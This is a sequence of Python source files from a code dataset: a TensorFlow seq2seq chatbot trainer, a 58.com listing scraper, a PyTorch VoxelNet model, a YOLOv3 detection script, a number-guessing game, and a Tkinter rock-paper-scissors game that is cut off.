size.\")\ntf.app.flags.DEFINE_integer(\"target_vocab_size\", 1000, \"target vocabulary size.\")\ntf.app.flags.DEFINE_string(\"train_dir\", \"./tmp/\", \"Training directory.\")\ntf.app.flags.DEFINE_string(\"vocab_path\", \"./tmp/\", \"Data directory\")\ntf.app.flags.DEFINE_string(\"data_path\", \"./tmp/\", \"Training directory.\")\ntf.app.flags.DEFINE_string(\"dev_data\", \"./tmp/\", \"Data directory\")\ntf.app.flags.DEFINE_integer(\"max_train_data_size\", 0,\n \"Limit on the size of training data (0: no limit).\")\ntf.app.flags.DEFINE_integer(\"steps_per_checkpoint\", 400,\n \"How many training steps to do per checkpoint.\")\ntf.app.flags.DEFINE_integer(\"beam_size\", 100,\n \"How many training steps to do per checkpoint.\")\ntf.app.flags.DEFINE_boolean(\"beam_search\", False,\n \"Set to True for beam_search.\")\ntf.app.flags.DEFINE_boolean(\"decode\", False,\n \"Set to True for interactive decoding.\")\ntf.app.flags.DEFINE_boolean(\"attention\", False,\n \"Set to True for interactive decoding.\")\ntf.app.flags.DEFINE_boolean(\"self_test\", False,\n \"Run a self-test if this is set to True.\")\n\nFLAGS = tf.app.flags.FLAGS\n\n_buckets = [(20, 50), (30, 80), (40, 120), (40, 150)]\n\n# 读取数据\ndef read_chat_data(data_path, word_index_ask, word_index_answer):\n\n f = open(data_path, 'r')\n data_set = [[] for _ in _buckets]\n\n for line in f:\n line = line.replace('\\n', '').strip().split('|')\n\n source = line[1].strip()\n target = line[0].strip()\n\n source_ids = [int(x) for x in sentence_to_token_ids(source, word_index_ask)]\n target_ids = [int(x) for x in sentence_to_token_ids(target, word_index_answer)]\n\n target_ids.append(EOS_ID)\n\n for bucket_id, (source_size, target_size) in enumerate(_buckets):\n if len(source_ids) < source_size and len(target_ids) < target_size:\n data_set[bucket_id].append([source_ids, target_ids])\n break\n return data_set\n\n\n\ndef create_model(session, forward_only, beam_search, beam_size = 10, attention = True):\n\n model = Seq2SeqModel(\n FLAGS.source_vocab_size, FLAGS.target_vocab_size, _buckets,\n FLAGS.size, FLAGS.num_layers, FLAGS.max_gradient_norm, FLAGS.batch_size,\n FLAGS.learning_rate, FLAGS.learning_rate_decay_factor,\n forward_only=forward_only, beam_search=beam_search, beam_size=beam_size, attention=attention)\n\n ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)\n\n if ckpt and tf.gfile.Exists(ckpt.model_checkpoint_path):\n print(\"Reading model parameters from %s\" % ckpt.model_checkpoint_path)\n model.saver.restore(session, ckpt.model_checkpoint_path)\n else:\n print(\"Created model with fresh parameters.\")\n session.run(tf.initialize_all_variables())\n return model\n\ndef create_models(path, en_vocab_size, session, forward_only, beam_search, beam_size = 10, attention = True):\n model = Seq2SeqModel(\n FLAGS.source_vocab_size, FLAGS.target_vocab_size, _buckets,\n FLAGS.size, FLAGS.num_layers, FLAGS.max_gradient_norm, FLAGS.batch_size,\n FLAGS.learning_rate, FLAGS.learning_rate_decay_factor,\n forward_only=forward_only, beam_search=beam_search, beam_size=beam_size, attention=attention)\n print(FLAGS.train_dir)\n ckpt = tf.train.get_checkpoint_state(path)\n\n # ckpt.model_checkpoint_path =\"./big_models/chat_bot.ckpt-183600\"\n # print ckpt.model_checkpoint_path\n if ckpt and tf.gfile.Exists(ckpt.model_checkpoint_path):\n print(\"Reading model parameters from %s\" % ckpt.model_checkpoint_path)\n model.saver.restore(session, ckpt.model_checkpoint_path)\n else:\n print(\"Created model with fresh parameters.\")\n session.run(tf.initialize_all_variables())\n return model\n\n\ndef train():\n\n data_path = 'data/test_w.txt'\n dev_data = 'data/test_v.txt'\n\n beam_search = False\n beam_size = 10\n attention = FLAGS.attention\n\n normalize_digits = True\n\n dim, dictionary_source, dictionary_target, index_word_ask, word_index_ask, \\\n index_word_answer, word_index_answer = create_vocabulary(data_path)\n\n FLAGS.source_vocab_size = len(dictionary_source)\n FLAGS.target_vocab_size = len(dictionary_target)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n # Create model.\n print(\"Creating %d layers of %d units.\" % (FLAGS.num_layers, FLAGS.size))\n model = create_model(sess, False, beam_search=beam_search, beam_size=beam_size, attention=attention)\n\n train_set = read_chat_data(data_path, word_index_ask, word_index_answer)\n dev_set = read_chat_data(dev_data, word_index_ask, word_index_answer)\n\n train_bucket_sizes = [len(train_set[b]) for b in xrange(len(_buckets))]\n train_total_size = float(sum(train_bucket_sizes))\n\n # A bucket scale is a list of increasing numbers from 0 to 1 that we'll use\n # to select a bucket. Length of [scale[i], scale[i+1]] is proportional to\n # the size if i-th training bucket, as used later.\n train_buckets_scale = [sum(train_bucket_sizes[:i + 1]) / train_total_size\n for i in xrange(len(train_bucket_sizes))]\n\n # This is the training loop.\n step_time, loss = 0.0, 0.0\n current_step = 0\n previous_losses = []\n while True:\n # Choose a bucket according to data distribution. We pick a random number\n # in [0, 1] and use the corresponding interval in train_buckets_scale.\n # print \"Started\"\n random_number_01 = np.random.random_sample()\n bucket_id = min([i for i in xrange(len(train_buckets_scale))\n if train_buckets_scale[i] > random_number_01])\n\n # Get a batch and make a step.\n start_time = time.time()\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n train_set, bucket_id)\n\n _, step_loss, _ = model.step(sess, encoder_inputs, decoder_inputs,\n target_weights, bucket_id, False, beam_search)\n\n step_time += (time.time() - start_time) / FLAGS.steps_per_checkpoint\n loss += step_loss / FLAGS.steps_per_checkpoint\n current_step += 1\n\n # Once in a while, we save checkpoint, print statistics, and run evals.\n # steps_per_checkpoint 400\n\n if current_step % FLAGS.steps_per_checkpoint == 0:\n # Print statistics for the previous epoch.\n print(\"Running epochs\")\n perplexity = math.exp(loss) if loss < 300 else float('inf')\n print(\"global step %d learning rate %.4f step-time %.2f perplexity \"\n \"%.2f\" % (model.global_step.eval(), model.learning_rate.eval(),\n step_time, perplexity))\n\n # # Decrease learning rate if no improvement was seen over last 3 times.\n if len(previous_losses) > 2 and loss > max(previous_losses[-3:]):\n sess.run(model.learning_rate_decay_op)\n\n previous_losses.append(loss)\n # # Save checkpoint and zero timer and loss.\n checkpoint_path = os.path.join(FLAGS.train_dir, \"chat_bot.ckpt\")\n model.saver.save(sess, checkpoint_path, global_step=model.global_step)\n step_time, loss = 0.0, 0.0\n\n # # Run evals on development set and print their perplexity.\n for bucket_id in xrange(len(_buckets)):\n if len(dev_set[bucket_id]) == 0:\n print(\" eval: empty bucket %d\" % (bucket_id))\n continue\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n dev_set, bucket_id)\n _, eval_loss, _ = model.step(sess, encoder_inputs, decoder_inputs,\n target_weights, bucket_id, True, beam_search)\n eval_ppx = math.exp(eval_loss) if eval_loss < 300 else float('inf')\n print(\" eval: bucket %d perplexity %.2f\" % (bucket_id, eval_ppx))\n sys.stdout.flush()\n\ndef decode():\n with tf.Session() as sess:\n\n # Load vocabularies.\n data_path = 'data/test_w.txt'\n\n dim, dictionary_source, dictionary_target, index_word_ask, word_index_ask, \\\n index_word_answer, word_index_answer = create_vocabulary(data_path)\n\n # Create model and load parameters.\n beam_size = FLAGS.beam_size\n beam_search = FLAGS.beam_search\n attention = FLAGS.attention\n\n FLAGS.source_vocab_size = len(dictionary_source)\n FLAGS.target_vocab_size = len(dictionary_target)\n\n\n model = create_model(sess, True, beam_search=beam_search, beam_size=beam_size, attention=attention)\n model.batch_size = 1 # We decode one sentence at a time.\n\n\n # Decode from standard input.\n if beam_search:\n sys.stdout.write(\"> \")\n sys.stdout.flush()\n sentence = sys.stdin.readline()\n while sentence:\n # Get token-ids for the input sentence.\n token_ids = sentence_to_token_ids(sentence.replace('\\n', '').strip(), word_index_ask)\n\n print(token_ids)\n\n # Which bucket does it belong to?\n bucket_id = min([b for b in xrange(len(_buckets))\n if _buckets[b][0] > len(token_ids)])\n # Get a 1-element batch to feed the sentence to the model.\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n {bucket_id: [(token_ids, [])]}, bucket_id)\n # Get output logits for the sentence.\n # print bucket_id\n path, symbol, output_logits = model.step(sess, encoder_inputs, decoder_inputs,\n target_weights, bucket_id, True, beam_search)\n\n k = output_logits[0]\n paths = []\n for kk in range(beam_size):\n paths.append([])\n curr = list(range(beam_size))\n num_steps = len(path)\n for i in range(num_steps-1, -1, -1):\n for kk in range(beam_size):\n paths[kk].append(symbol[i][curr[kk]])\n curr[kk] = path[i][curr[kk]]\n recos = set()\n\n print(paths)\n print(\"Replies --------------------------------------->\")\n for kk in range(beam_size):\n foutputs = [int(logit) for logit in paths[kk][::-1]]\n\n # If there is an EOS symbol in outputs, cut them at that point.\n if EOS_ID in foutputs:\n # # print outputs\n foutputs = foutputs[:foutputs.index(EOS_ID)]\n print(foutputs)\n rec = \" \".join([str(index_word_answer[output]) for output in foutputs])\n if rec not in recos:\n recos.add(rec)\n print(rec)\n\n print(\"> \", \"\")\n sys.stdout.flush()\n sentence = sys.stdin.readline()\n else:\n sys.stdout.write(\"> \")\n sys.stdout.flush()\n sentence = sys.stdin.readline()\n\n while sentence:\n # Get token-ids for the input sentence.\n token_ids = sentence_to_token_ids(sentence.replace('\\n', '').strip(), word_index_ask)\n\n # Which bucket does it belong to?\n bucket_id = min([b for b in xrange(len(_buckets))\n if _buckets[b][0] > len(token_ids)])\n # for loc in locs:\n # Get a 1-element batch to feed the sentence to the model.\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n {bucket_id: [(token_ids, [],)]}, bucket_id)\n\n _, _, output_logits = model.step(sess, encoder_inputs, decoder_inputs,\n target_weights, bucket_id, True, beam_search)\n # This is a greedy decoder - outputs are just argmaxes of output_logits.\n\n outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits]\n print(len(output_logits))\n\n for j in range(len(output_logits)):\n print(len(output_logits[j][0]))\n\n # If there is an EOS symbol in outputs, cut them at that point.\n\n print(outputs)\n if EOS_ID in outputs:\n # print outputs\n outputs = outputs[:outputs.index(EOS_ID)]\n\n print(\" \".join([tf.compat.as_str(index_word_answer[output]) for output in outputs]))\n print(\"> \", \"\")\n sys.stdout.flush()\n sentence = sys.stdin.readline()\n\n\ndef main(_):\n if FLAGS.decode:\n decode()\n else:\n train()\n\nif __name__ == \"__main__\":\n tf.app.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"neural_conversation_model.py","file_name":"neural_conversation_model.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"350509918","text":"#encoding:utf-8\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\n\n#以下函数定义起始页的网页列表的获取方法\ndef get_url_lists(starturl):\n start_web = requests.get(starturl)\n soup = BeautifulSoup(start_web.text,'lxml')\n webs = soup.select('td.t > a.t')\n url_lists = [web.get('href') for web in webs]\n return url_lists\n\n#以下函数定义从列表中的网页中获取内容的方法\ndef get_web_content(url):\n #下面开始处理页面内容\n web_content = requests.get(url)\n time.sleep(3)\n soup = BeautifulSoup(web_content.text,'lxml')\n titles = soup.select('h1')\n publish_times = soup.select('li.time')\n prices = soup.select('div.su_con > span')\n sale_types = soup.select('div.num_tan_text > span:nth-of-type(1)') #这里要带上span标签的顺序,nth-of-type(1)是第一个标签!\n districts = soup.select('span.c_25d > a')\n categorys = soup.select('span:nth-of-type(3) > a')\n for title,publish_time,price,sale_type,district,category in zip(titles,publish_times,prices,sale_types,districts,categorys):\n #先处理一个js的浏览量问题:\n url_split = url.split('&')\n url_id = url_split[-1][8:-2]\n browse_url='http://jst1.58.com/counter?infoid='+str(url_id)\n browse_content = requests.get(browse_url)\n soup1 = BeautifulSoup(browse_content.text,'lxml')\n browse_nums = str(soup1.p)\n browse_nums_list = browse_nums.split('.')\n browse_num = browse_nums_list[-1][6:-4]\n #下面判断商家和个人的类型\n if(len(sale_type.get_text())==11):\n sale_type='商家'\n else:\n sale_type='个人'\n web_contents = {\n '商品标题':title.get_text(),\n '浏览量':browse_num,\n '发帖时间':publish_time.get_text(),\n '价格' : price.get_text(),\n '卖家类型' : sale_type,\n '区域' : district.get_text(),\n '类目' : category.get_text()\n }\n print(web_contents)\n\n#以下函数循环执行获取目标网页内容\ndef urls_loop_get(urls):\n for url in urls:\n get_web_content(url)\n\nif __name__==\"__main__\":\n url = \"http://bj.58.com/pbdn/?PGTID=0d100000-0000-1121-f41b-137aeef068b7&ClickID=6\"\n urls=get_url_lists(url)\n urls_loop_get(urls)","sub_path":"week1大作业提交/huyongsheng/exercise_1.py","file_name":"exercise_1.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196169981","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport yaml\nimport math\n\nyamlPath = \"configure.yaml\"\nf = open(yamlPath, 'r', encoding='utf-8')\nconf = f.read()\nconf_dict = yaml.safe_load(conf) \n\nif_cuda = True if conf_dict['if_cuda'] == 1 and torch.cuda.is_available() else False\nbatch_size = conf_dict['batch_size']\nrange_x=conf_dict['range_x']\nrange_y=conf_dict['range_y']\nrange_z=conf_dict['range_z']\nvox_depth = conf_dict['vox_d']\nvox_width = conf_dict['vox_w']\nvox_height = conf_dict['vox_h']\nanchor_per_pos = conf_dict['anchors_per_vox']\npt_thres_per_vox = conf_dict['pt_thres_per_vox']\n\nW = math.ceil((max(range_x)-min(range_x))/vox_width)\nH = math.ceil((max(range_y)-min(range_y))/vox_height)\nD = math.ceil((max(range_z)-min(range_z))/vox_depth)\n\nclass Conv3d(nn.Module):\n def __init__(self, in_channels, out_channels, k, s, p):\n super(Conv3d, self).__init__()\n self.conv = nn.Conv3d(in_channels, out_channels, kernel_size=k, stride=s, padding=p)\n self.bn = nn.BatchNorm3d(out_channels)\n \n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n \nclass Conv2d(nn.Module):\n def __init__(self,in_channels,out_channels,k,s,p, activation=True, batch_norm=True):\n super(Conv2d, self).__init__()\n self.conv = nn.Conv2d(in_channels,out_channels,kernel_size=k,stride=s,padding=p)\n if batch_norm:\n self.bn = nn.BatchNorm2d(out_channels)\n else:\n self.bn = None\n self.activation = activation\n def forward(self,x):\n x = self.conv(x)\n if self.bn is not None:\n x=self.bn(x)\n if self.activation:\n return F.relu(x,inplace=True)\n else:\n return x\n\nclass FCN(nn.Module):\n\n def __init__(self,cin,cout):\n super(FCN, self).__init__()\n self.cout = cout\n self.linear = nn.Linear(cin, cout)\n self.bn = nn.BatchNorm1d(cout)\n\n def forward(self,x):\n # KK is the stacked k across batch\n K, T, _ = x.shape\n x = self.linear(x.view(K*T,-1))\n x = self.bn(x)\n x = F.relu(x)\n return x.view(K,T,-1)\n\n\n# Voxel Feature Encoding layer\nclass VFE(nn.Module):\n\n def __init__(self,cin,cout):\n super(VFE, self).__init__()\n self.units = int(cout / 2)\n self.fcn = FCN(cin,self.units)\n\n def forward(self, x, mask):\n # point-wise feauture\n pointwise = self.fcn(x)\n aggregated = torch.max(pointwise,1)[0]\n repeated = aggregated.unsqueeze(1).repeat(1,pt_thres_per_vox,1)\n pointwise_concat = torch.cat((pointwise,repeated),dim=2)\n mask = mask.unsqueeze(2).repeat(1, 1, self.units * 2)\n return pointwise_concat * mask.float()\n\n\n# Stacked Voxel Feature Encoding\nclass SVFE(nn.Module):\n def __init__(self):\n super(SVFE, self).__init__()\n self.vfe_1 = VFE(7,32)\n self.vfe_2 = VFE(32,128)\n self.fcn = FCN(128,128)\n def forward(self, x):\n mask = torch.ne(torch.max(x,2)[0], 0)\n x = self.vfe_1(x, mask)\n x = self.vfe_2(x, mask)\n x = self.fcn(x)\n # element-wise max pooling\n x = torch.max(x,1)[0]\n return x\n\n# Convolutional Middle Layer\nclass ConvoMidLayer(nn.Module):\n def __init__(self):\n super(ConvoMidLayer, self).__init__()\n self.conv3d_1 = Conv3d(128, 64, 3, s=(2, 1, 1), p=(1, 1, 1))\n self.conv3d_2 = Conv3d(64, 64, 3, s=(1, 1, 1), p=(0, 1, 1))\n self.conv3d_3 = Conv3d(64, 64, 3, s=(2, 1, 1), p=(1, 1, 1))\n\n def forward(self, x):\n x = self.conv3d_1(x)\n x = self.conv3d_2(x)\n x = self.conv3d_3(x)\n x = x.permute(0, 2, 3, 4, 1)\n x = x.reshape(-1, H, W, 128)\n return x\n\n# Region Proposal Network\nclass RPN(nn.Module):\n def __init__(self):\n super(RPN, self).__init__()\n self.block_1 = nn.Sequential(Conv2d(128, 128, 3, 2, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1))\n \n self.deconv_3 = nn.Sequential(nn.ConvTranspose2d(128, 256, 1, 1, 0),\n nn.BatchNorm2d(256))\n \n self.block_2 = nn.Sequential(Conv2d(128, 128, 3, 2, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1))\n \n self.deconv_2 = nn.Sequential(nn.ConvTranspose2d(128, 256, 2, 2, 0),\n nn.BatchNorm2d(256))\n \n self.block_3 = nn.Sequential(Conv2d(128, 256, 3, 2, 1),\n Conv2d(256, 256, 3, 1, 1),\n Conv2d(256, 256, 3, 1, 1),\n Conv2d(256, 256, 3, 1, 1),\n Conv2d(256, 256, 3, 1, 1),\n Conv2d(256, 256, 3, 1, 1))\n\n self.deconv_1 = nn.Sequential(nn.ConvTranspose2d(256, 256, 4, 4, 0),\n nn.BatchNorm2d(256))\n \n \n\n self.score_head = Conv2d(768, anchor_per_pos, 1, 1, 0, activation=False, batch_norm=False)\n self.reg_head = Conv2d(768, 7 * anchor_per_pos, 1, 1, 0, activation=False, batch_norm=False)\n\n def forward(self,x):\n x = self.block_1(x)\n x_decon_bloc1 = x\n x = self.block_2(x)\n x_decon_bloc2 = x\n x = self.block_3(x)\n x = torch.cat((self.deconv_1(x),self.deconv_2(x_decon_bloc2),self.deconv_3(x_decon_bloc1)),1)\n return self.score_head(x),self.reg_head(x)\n\nclass VoxelNet(nn.Module):\n def __init__(self):\n super(VoxelNet, self).__init__()\n self.svfe = SVFE()\n self.cml = ConvoMidLayer()\n self.rpn = RPN()\n \n def voxelize(self, sparse_features, coords):\n dim = sparse_features.shape[-1]\n if if_cuda:\n dense_feature = Variable(torch.zeros(dim, batch_size, D, H, W).cuda())\n else:\n dense_feature = Variable(torch.zeros(dim, batch_size, D, H, W))\n dense_feature[:, coords[:,0], coords[:,1], coords[:,2], coords[:,3]]= sparse_features.transpose(1,0)\n return dense_feature.transpose(0,1)\n\n def forward(self, voxel_features, voxel_coords):\n # feature learning network\n vwfs = self.svfe(voxel_features)\n vwfs = self.voxelize(vwfs,voxel_coords)\n psm,rm = self.rpn(self.cml(vwfs).view(batch_size, -1, H, W))\n return psm, rm\n","sub_path":"VoxelNet1.py","file_name":"VoxelNet1.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"383863570","text":"import time\nfrom absl import app, flags, logging\nfrom absl.flags import FLAGS\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom yolov3_tf2.models import (\n YoloV3, YoloV3Tiny\n)\nfrom yolov3_tf2.dataset import transform_images, load_tfrecord_dataset\nfrom yolov3_tf2.utils import draw_outputs\nimport zetane\n\nflags.DEFINE_string('classes', './data/coco.names', 'path to classes file')\nflags.DEFINE_string('weights', './checkpoints/yolov3.tf',\n 'path to weights file')\nflags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')\nflags.DEFINE_integer('size', 416, 'resize images to')\nflags.DEFINE_string('image', './data/girl.png', 'path to input image')\nflags.DEFINE_string('tfrecord', None, 'tfrecord instead of image')\nflags.DEFINE_string('output', './output.jpg', 'path to output image')\nflags.DEFINE_integer('num_classes', 80, 'number of classes in the model')\n\ndef make_io_panels(zctxt):\n input_panel = zctxt.panel('Input', width=0.25, height=0.3, screen_x=0.0, screen_y=0.7, navigation='2d').set_camera(position=(\n 1, 0.75, 30), aim=(1, 0.75, 0)).set_background_color(rgb=(0.025, 0.02, 0.045)).border(3).set_border_alpha(0.05).update()\n output_panel = zctxt.panel('Output', width=0.25, height=0.3, screen_x=0.0, screen_y=0.0, navigation='2d').set_camera(position=(\n 1, 0.75, 30), aim=(1, 0.75, 0)).set_background_color(rgb=(0.025, 0.02, 0.045)).border(3).set_border_alpha(0.05).update()\n zctxt.text(\"Input\").font_size(0.1).position(y=-.45).send_to(input_panel).update()\n zctxt.text(\"Output\").font_size(.1).position(y=-.45).send_to(output_panel).update()\n return input_panel, output_panel\n\ndef main(_argv):\n physical_devices = tf.config.experimental.list_physical_devices('GPU')\n for physical_device in physical_devices:\n tf.config.experimental.set_memory_growth(physical_device, True)\n\n if FLAGS.tiny:\n yolo = YoloV3Tiny(classes=FLAGS.num_classes)\n else:\n yolo = YoloV3(classes=FLAGS.num_classes)\n\n yolo.load_weights(FLAGS.weights).expect_partial()\n logging.info('weights loaded')\n\n class_names = [c.strip() for c in open(FLAGS.classes).readlines()]\n logging.info('classes loaded')\n\n if FLAGS.tfrecord:\n dataset = load_tfrecord_dataset(\n FLAGS.tfrecord, FLAGS.classes, FLAGS.size)\n dataset = dataset.shuffle(512)\n img_raw, _label = next(iter(dataset.take(1)))\n else:\n img_raw = tf.image.decode_image(\n open(FLAGS.image, 'rb').read(), channels=3)\n\n img = tf.expand_dims(img_raw, 0)\n img = transform_images(img, FLAGS.size)\n\n ctxt = zetane.Context()\n ctxt.clear_universe()\n\n input_panel, output_panel = make_io_panels(ctxt)\n image_np = np.transpose(img.numpy(), (1, 2, 3, 0))\n to_fit = 0.15 / image_np.shape[2]\n zinput = ctxt.image().data(image_np).scale(to_fit, to_fit).send_to(input_panel).update()\n zmodel = ctxt.model().keras(yolo).inputs(img.numpy()).update()\n\n t1 = time.time()\n #boxes, scores, classes, nums = yolo(img)\n bbox, confidence, class_probs, scores = yolo(img)\n boxes, scores, classes, nums = tf.image.combined_non_max_suppression(\n boxes=tf.reshape(bbox, (tf.shape(bbox)[0], -1, 1, 4)),\n scores=tf.reshape(\n scores, (tf.shape(scores)[0], -1, tf.shape(scores)[-1])),\n max_output_size_per_class=FLAGS.yolo_max_boxes,\n max_total_size=FLAGS.yolo_max_boxes,\n iou_threshold=FLAGS.yolo_iou_threshold,\n score_threshold=FLAGS.yolo_score_threshold\n )\n\n t2 = time.time()\n logging.info('time: {}'.format(t2 - t1))\n\n logging.info('detections:')\n for i in range(nums[0]):\n logging.info('\\t{}, {}, {}'.format(class_names[int(classes[0][i])],\n np.array(scores[0][i]),\n np.array(boxes[0][i])))\n\n #out_img = cv2.cvtColor(img_raw.numpy(), cv2.COLOR_RGB2BGR)\n out_img = draw_outputs(img_raw.numpy()/225.0, (boxes, scores, classes, nums), class_names)\n\n to_fit = 0.15 / out_img.shape[2]\n zoutput = ctxt.image().data(out_img).scale(to_fit, to_fit).send_to(output_panel).update()\n #cv2.imwrite(FLAGS.output, img)\n #logging.info('output saved to: {}'.format(FLAGS.output))\n\n ctxt.disconnect()\n\nif __name__ == '__main__':\n try:\n app.run(main)\n except SystemExit:\n pass\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"115109399","text":"# Guess My Number\n#\n# Modify the Guess My Number chapter project from Chapter 3\n# by reusing the function ask_number().\n\nimport random\n\ndef ask_number(question, low, high, step=1):\n \"\"\"Ask for a number within a range\"\"\"\n response = None\n while response not in range(low, high, step):\n response = int(input(question))\n return response\n\ndef main():\n\tprint(\"\\tWelcome to 'Guess My Number'!\")\n\tprint(\"\\nI'm thinking of a number between 1 and 100.\")\n\tprint(\"Try to guess it in as few attempts as possible.\")\n\tprint(\"you only have 8 guesses so choose wisely.\\n\")\n\n\t# set the initial values\n\tthe_number = random.randint(1, 100)\n\tguess = ask_number(\"Take a guess(improved): \", 1, 101)\n\ttries = 1\n\n\twhile guess != the_number:\n\t\t\n\t\tif tries == 8:\n\t\t\tbreak\n\t\t\n\t\tif guess > the_number:\n\t\t\tprint(\"Lower...\")\n\t\telse:\n\t\t\tprint(\"Higher...\")\n\t\t\n\t\tguess = ask_number(\"Take a guess(improved): \", 1, 101)\n\t\ttries += 1\n\n\tif guess == the_number:\n\t\tprint(\"\\nYou guessed it! The number was\", the_number)\n\t\tprint(\"And it only took you\", tries, \"tries!\\n\")\n\telse:\n\t\tprint(\"\\nYou failed you idiot! The number was\", the_number, \"\\n\")\n\t\t\n\t\t\n\t\t\n\tinput(\"\\n\\nPress the enter key to exit.\")\n\t\nmain()\n","sub_path":"MyChallengeCode/ch6/guess_my_number_functions.py","file_name":"guess_my_number_functions.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"260172837","text":"import tkinter as tk\r\nimport random\r\nimport os\r\n\r\ndirname = os.path.dirname(__file__)\r\n\r\n# fenetre\r\n \r\nwindow = tk.Tk()\r\nwindow.title(\"Chifoumi\")\r\nwindow.geometry(\"400x400\")\r\nwindow.config(bg=\"#7FD7DF\")\r\nwindow.iconbitmap(os.path.join(dirname, 'assets/ico.ico'))\r\nwindow.resizable(width=False, height=False)\r\n\r\n# images\r\n\r\ncanvas = tk.Canvas(window, width=340, height=150, bg=\"#7FD7DF\")\r\n\r\nimg11 = tk.PhotoImage(file=os.path.join(dirname, \"assets/chisel vs chisel.png\"))\r\nimg12 = tk.PhotoImage(file=os.path.join(dirname, \"assets/chisel vs leaf.png\"))\r\nimg13 = tk.PhotoImage(file=os.path.join(dirname, \"assets/chisel vs pierre.png\"))\r\n\r\nimg21 = tk.PhotoImage(file=os.path.join(dirname, \"assets/leaf vs chisel.png\"))\r\nimg22 = tk.PhotoImage(file=os.path.join(dirname, \"assets/leaf vs leaf.png\"))\r\nimg23 = tk.PhotoImage(file=os.path.join(dirname, \"assets/leaf vs pierre.png\"))\r\n\r\nimg31 = tk.PhotoImage(file=os.path.join(dirname, \"assets/pierre vs chisel.png\"))\r\nimg32 = tk.PhotoImage(file=os.path.join(dirname, \"assets/pierre vs leaf.png\"))\r\nimg33 = tk.PhotoImage(file=os.path.join(dirname, \"assets/pierre vs pierre.png\"))\r\n\r\n# choix et scores\r\n\r\nuser_score = 0\r\nscript_score = 0\r\n\r\ndef add_user_score():\r\n \r\n global user_score, script_score\r\n user_score += 1\r\n\r\n label_user_score = tk.Label(window, text=user_score, bg=\"#7FD7DF\", font=(\"Helvetica\", 25), fg='white')\r\n label_user_score.place(x=75, y=18)\r\n\r\ndef add_script_score():\r\n \r\n global user_score, script_score\r\n script_score += 1\r\n\r\n label_script_score = tk.Label(window, text=script_score, bg=\"#7FD7DF\", font=(\"Helvetica\", 25), fg='white')\r\n label_script_score.place(x=298, y=18)\r\n\r\ndef choose_chisel():\r\n\r\n label_you = tk.Label(window, text=\"You :\", bg=\"yellow\")\r\n label_you.place(x=30, y=30)\r\n\r\n label_you = tk.Label(window, text=\"AI :\", bg=\"yellow\")\r\n label_you.place(x=260, y=30)\r\n \r\n label_welcome.destroy()\r\n script_tool = random.randint(1, 3)\r\n user_tool = 1\r\n\r\n if user_tool == 1 and script_tool == 1:\r\n image1 = canvas.create_image(170,77, image=img11)\r\n canvas.place(x=30, y=80)\r\n\r\n elif user_tool == 1 and script_tool == 2:\r\n image2 = canvas.create_image(170,77, image=img12)\r\n canvas.place(x=30, y=80)\r\n add_user_score()\r\n\r\n elif user_tool == 1 and script_tool == 3:\r\n image3 = canvas.create_image(170,77, image=img13)\r\n canvas.place(x=30, y=80)\r\n add_script_score()\r\n\r\ndef choose_leaf():\r\n \r\n global user_score, script_score\r\n\r\n label_you = tk.Label(window, text=\"You :\", bg=\"yellow\")\r\n label_you.place(x=30, y=30)\r\n\r\n label_you = tk.Label(window, text=\"AI :\", bg=\"yellow\")\r\n label_you.place(x=260, y=30)\r\n\r\n label_welcome.destroy()\r\n script_tool = random.randint(1, 3)\r\n user_tool = 2\r\n\r\n if user_tool == 2 and script_tool == 1:\r\n image1 = canvas.create_image(170,77, image=img21)\r\n canvas.place(x=30, y=80)\r\n add_script_score()\r\n\r\n elif user_tool == 2 and script_tool == 2:\r\n image2 = canvas.create_image(170,77, image=img22)\r\n canvas.place(x=30, y=80)\r\n\r\n elif user_tool == 2 and script_tool == 3:\r\n image3 = canvas.create_image(170,77, image=img23)\r\n canvas.place(x=30, y=80)\r\n add_user_score()\r\n\r\ndef choose_pierre():\r\n\r\n global user_score, script_score\r\n\r\n label_you = tk.Label(window, text=\"You :\", bg=\"yellow\")\r\n label_you.place(x=30, y=30)\r\n\r\n label_you = tk.Label(window, text=\"AI :\", bg=\"yellow\")\r\n label_you.place(x=260, y=30)\r\n \r\n label_welcome.destroy()\r\n script_tool = random.randint(1, 3)\r\n user_tool = 3\r\n\r\n if user_tool == 3 and script_tool == 1:\r\n image1 = canvas.create_image(170,77, image=img31)\r\n canvas.place(x=30, y=80)\r\n add_user_score()\r\n\r\n elif user_tool == 3 and script_tool == 2:\r\n image2 = canvas.create_image(170,77, image=img32)\r\n canvas.place(x=30, y=80)\r\n add_script_score()\r\n \r\n elif user_tool == 3 and script_tool == 3:\r\n image3 = 